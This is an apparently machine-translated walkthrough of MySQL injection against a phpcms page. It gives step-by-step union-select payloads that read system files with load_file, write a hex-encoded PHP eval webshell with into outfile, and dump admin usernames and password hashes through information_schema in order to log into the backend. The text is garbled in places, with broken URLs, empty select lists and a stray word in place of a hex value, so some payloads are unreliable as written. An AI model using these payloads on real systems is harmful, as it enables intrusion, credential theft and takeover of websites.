Early Mysql injection experience injection with Root permissions and system table injection by common users

 

Author: left

 

The test environment is win7sp1 + iis7.5 + mysql5.1, the target is a small phpcms website, the address of the injection exists is http://www.bkjia.com/show. php? Id = 2

 

For the first time, I wrote an article ......

 

1. mysql injection with Root permission

Add the quotation mark http://www.bkjia.com/show. php directly behind the URL? Id = 2'

The Mysql database is directly exposed. xor 1 = 1 xor 1 = 2 is used to determine integer injection;

Are you sure you want to submit a http://www.bkjia.com/show. php? Id = 2 and ord (mid (version (), 5.1)> 51, return correct, version greater than, support union query;

Use order by to check the number of fields. If the value is 15, the value is correct. If the value is 16, the length of the field is 15;

Show field location http://www.bkjia.com/show. php? Id = 2 and 1 <1 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, show 3 and 11 locations

Now let's confirm the current user permissions and submit http://www.bkjia.com/show. php? Id = 2 and 1 <1 union select, user (), 10, database (),

It is root permission. From root @ localhost, we can see that the current website and database are on the same machine. Of course, we tested it on our own computer.

Since it is the root permission and is an integer injection, We Can load_file () and export webshell. The load_file () content is displayed at 3 or 11, http://www.bkjia.com/show. php? Id = 2 and 1 <1 union select 1, 2, load_file ('C: \ boot. ini '), and results do not show any content, for a variety of reasons, may not support characters at the location, it is also possible that the length of both locations is defined too short to continue submitting http://www.bkjia.com/show. php? Id = 2 and 1 = 2 union select 1, 2, load_file (char (111,111,116, 46,105,110,105 ,),

C: \ boot. ini content, where char (111,111,116, 46,105,110,105,) is c: \ boot. ini ascii encoding we combined out_file to display the content, the premise is to know the current site path, directly access the http://www.bkjia.com/data/burst the current site path (php enabled error prompt, otherwise, you have to guess the path)

Then generate webshell with outfile, submit http://www.bkjia.com/show. php? Id = 2 and 1 = 2 union select, random, into outfile 'f: \ websites \ phpaaCMS-UTF8-0.3.1 \ phpaaCMS-UTF8-0.3.1 \ 1. php '0x3c3f706870206576616c28245f504f53545b7a5d293b3f3e is a hexadecimal code of a Trojan Horse. Use a single sentence client to connect

Successful

2. injection with non-root permissions, using the information_schema system table

Users with non-root permissions generally do not have the load_file permission, because load_file requires the FILE Permission, while normal users generally do not have the FILE permission, at this time, the injection idea is similar to asp, but a very favorable condition for mysql versions above 5 is that it stores a system library information_schema, which stores the system information of the database, as long as there is an injection, you can determine to win the user password. The tables and fields in mysql are no longer tested, similar to asp. Now we use information_schema to guess the password.

The injection address and fields displayed in the union query are 3, 11.

Http://www.bkjia.com? show. php? Id = 2 and 1 = 2 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15

Submit http://www.bkjia.com/show. php? Id = 2 and 1 = 2 union select, unhex (hex (group_concat (schema_name), from information_schema.schemata

Determine the current database name as phpaa

Then judge all the table names in the current database and submit the http://www.bkjia.com/show. php? Id = 2 and 1 = 2 union select, unhex (hex (group_concat (table_name, 7068706161 from information_schema.tables where table_schema = 0 x, all the table names in the current database are displayed, where 0x7068706161 is the hex code of phpaa.

Found that the cms_users table is more sensitive, then query all the field names in this table, submit the http://www.bkjia.com/show. php? Id = 2 and 1 = 2 union select, unhex (hex (group_concat (column_name), from information_schema.columns where table_name = Hangzhou,

Apparently the field is username and password field is username, password, query, submit http://www.bkjia.com/show. php? Id = 2 and 1 = 2 union select, username, 10, password, from cms_users

On the md5 website, the md5hash is parsed and found to be admin. This user is successfully logged on to the background.